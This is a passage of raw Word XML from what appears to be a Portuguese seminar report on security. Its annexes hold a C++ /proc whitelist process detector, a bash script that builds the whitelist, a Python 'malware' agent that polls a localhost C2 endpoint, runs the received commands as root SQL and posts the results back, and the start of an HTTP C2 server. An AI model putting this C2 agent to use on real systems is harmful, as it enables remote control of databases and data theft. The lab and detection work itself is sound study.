    <w:p w14:paraId="7073C8EA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</w:p>
    <w:p w14:paraId="24EFB64A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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int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main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() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B310356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const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string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whitelist_file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= "white_list.txt";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4259B489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auto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execs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=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load_whitelist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(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whitelist_file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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066FD1C0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</w:p>
    <w:p w14:paraId="0ACE6E66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if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(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execs.empty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()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6DE2A6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cerr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&lt;&lt; "Nenhum executável carregado!\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9CB880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return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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5EB0D6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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B2CD46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</w:p>
    <w:p w14:paraId="7A79AD80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DIR*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dir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=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opendir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("/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proc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");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2901F4BF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</w:p>
    <w:p w14:paraId="4B1716EE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if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(!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dir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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7969B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cerr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&lt;&lt; "Erro ao abrir /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proc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\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9929A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return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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1639CCB4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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426ED60E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</w:p>
    <w:p w14:paraId="3116A78F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struct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dirent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*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entry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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D26F5EF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bool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flag = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB5BB9F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while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((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entry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=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readdir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(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dir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)) !=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nullptr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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBAEE2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string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pid_str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=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entry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-&gt;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d_name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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0F20F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string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exe_path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= "/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proc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/" +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pid_str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+ "/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exe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";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D73211D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</w:p>
    <w:p w14:paraId="14CA0C16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    char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real_path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[PATH_MAX];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E6476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ssize_t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len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=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readlink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(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exe_path.c_str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(),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real_path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,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sizeof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(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real_path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) - 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A0CCBF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</w:p>
    <w:p w14:paraId="2DDB98F9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if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(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len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!= -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C885D46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    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real_path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[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len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] = '\0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766F37F1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    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string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caminho(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real_path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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C21FE0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    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if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(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execs.find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(caminho) ==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execs.end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()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694D89A6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        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cout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&lt;&lt; "[!!] Processo suspeito encontrado: PID " &lt;&lt;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pid_str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&lt;&lt; " - " &lt;&lt; caminho &lt;&lt; "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA684C3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            flag =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true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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540166A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        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A8B7B9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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D1E88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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A917A8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</w:p>
    <w:p w14:paraId="48FD501D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if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(!flag) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F73856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cout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;&lt; "Nenhum processo suspeito encontrado!\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F38FFDF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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD1CE6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</w:p>
    <w:p w14:paraId="1A0A8C62" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="006E0A25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theme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    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closedir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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45746DF7" w14:textId="26AA0D94" w:rsidR="006E0A25" w:rsidRPr="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="00862EBB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC63CDE" w14:textId="77777777" w:rsidR="00862EBB" w:rsidRDefault="00862EBB" w:rsidP="006E0A2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D2AA24B" w14:textId="64D7A448" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="006E0A25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ANEXO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Código </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> para construção da lista de processos (procs_whitelist.sh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D665AE" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74077C42" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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5E36DBB9" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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>&gt; white_list.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799829D6" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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5D89EA94" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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for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pid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in $(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ls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/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proc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|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grep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-E '^[0-9]+$'); do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF92914" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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if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[ -r "/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proc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/$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pid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/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exe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" ];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then</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="07A99AAB" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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exe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=$(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readlink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-f "/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proc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/$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pid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/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exe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" 2&gt;/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dev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/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null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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109F40A8" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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if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[ -n "$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exe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" ];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then</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="488018CA" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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echo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"$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exe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" &gt;&gt; white_list.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543DA37" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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    continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47177235" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69852967" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34923F91" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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699D6DC6" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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if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[ -r "/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proc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/$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pid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/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comm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" ];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then</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57892570" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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comm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=$(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cat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/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proc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/$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pid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/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comm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2&gt;/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dev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/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null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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E11BA" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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if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[ -n "$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comm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" ];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then</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70AAF6D1" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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echo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"$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comm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" &gt;&gt; white_list.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB9F7E" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43B29072" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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fi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="345C3FEE" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="520D511F" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRPr="00862EBB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7E6D4AD7" w14:textId="63EDECEC" w:rsidR="006E0A25" w:rsidRPr="00862EBB" w:rsidRDefault="006E0A25" w:rsidP="006E0A25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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort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-u white_list.txt -o white_list.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11567CB8" w14:textId="77777777" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="00A82F7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DFB698C" w14:textId="092D33DA" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="00A82F7B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ANEXO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Código do malware (</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tooltip="malwarehttp.py" w:history="1">
        <w:r w:rsidR="006E0A25" w:rsidRPr="006E0A25">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>malwarehttp.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B84B0C3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6E0A25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6E0A2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requests</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C7E242C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6E0A25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6E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3E8539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6E0A25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6E0A2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mysql.connector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F89C25B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6E0A25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6E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> urllib3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F21792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6C7EEEEA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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>urllib3.disable_warnings()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA06DA8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119BC08B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6E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A2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execute_sql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(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sql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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36474D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0A2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try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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A0E4C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0A2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db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25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mysql.connector.connect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(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E32B5D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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            host="127.0.0.1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0359A4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0A2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user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="root",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A92BC08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0A2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="Leo250262",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A444796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0A2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database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="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seg_seminario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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B26AC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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578784E0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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        cursor =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db.cursor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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050170E7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0A2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cursor.execute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(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sql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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2354F422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0D268842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0A2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if</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A2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cursor.with_rows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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A45FF88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0A2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E0A25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cursor.fetchall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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68B6B0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0A2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else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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E352CD7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0A2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db.commit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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09062912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0A2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E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = f"{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cursor.rowcount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} linha(s) afetada(s)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C625FD8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7503C62B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0A2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cursor.close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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD6649F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0A2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db.close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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DEEB20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0A2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6E0A2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result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DEEE969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0A2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except</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A2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Exception</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D6997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0A2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6E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> f"[ERRO] {e}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534896DA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22D01099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6E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "https://localhost:8443/api/v1/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command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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23198A89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25E47227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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>print("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Ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> iniciado e buscando comandos...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FC077A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2AB7ADD6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6E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A2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True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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6394AE67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0A2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try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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F38014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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        res =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requests.get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(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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25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verify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=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D857739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0A2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command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25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res.json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().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get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("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command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", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BBE7E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7307BA1E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0A2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if</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A2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command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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7C02A5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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            print(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f"Executando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: {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command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}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527E1D3A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0A2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E0A25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execute_sql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(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command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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B341722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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            print(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f"Resultado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: {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}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28683DC2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0A2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requests.post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("https://localhost:8443/api/v1/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E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">",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json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">={"output":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str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(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E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)},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verify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=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4215FD1D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0A2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else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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C1FDE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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("Nenhum comando recebido.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607F7BC9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0A2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except</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A2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Exception</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BCBCB1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0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(f"[ERRO NA CONEXÃO] {e}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049F90A5" w14:textId="77777777" w:rsidR="006E0A25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14650623" w14:textId="787CC236" w:rsidR="00A82F7B" w:rsidRPr="006E0A25" w:rsidRDefault="006E0A25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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0A2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E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>time.sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0A25">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E4674" w14:textId="77777777" w:rsidR="006E0A25" w:rsidRDefault="006E0A25" w:rsidP="00A82F7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2A92DE8" w14:textId="65ECC96A" w:rsidR="00A82F7B" w:rsidRDefault="00A82F7B" w:rsidP="00A82F7B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ANEXO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> – Código do servidor C2 (</w:t>
      </w:r>
      <w:r w:rsidR="00862EBB" w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>clienthttp.py</w:t>
      </w:r>
      <w:r w:rsidR="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AC19A8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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from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http.server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BaseHTTPRequestHandler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HTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="306110DB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862EBB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json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16D07EB3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862EBB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ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57994409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862EBB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threading</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DD3F126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36D71D84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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_command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= "&gt;&gt;&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75941B34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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>result_received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= ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE49A51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5600FC27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862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>class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SimpleHandler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(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BaseHTTPRequestHandler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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED63F21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def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_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set_headers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(self, status=200,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content_type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="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application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/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json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"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C40C275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self.send_response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(status)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B70EAE1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self.send_header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("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Content-Type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",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content_type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)</w:t>
      </w:r>
    </w:p>
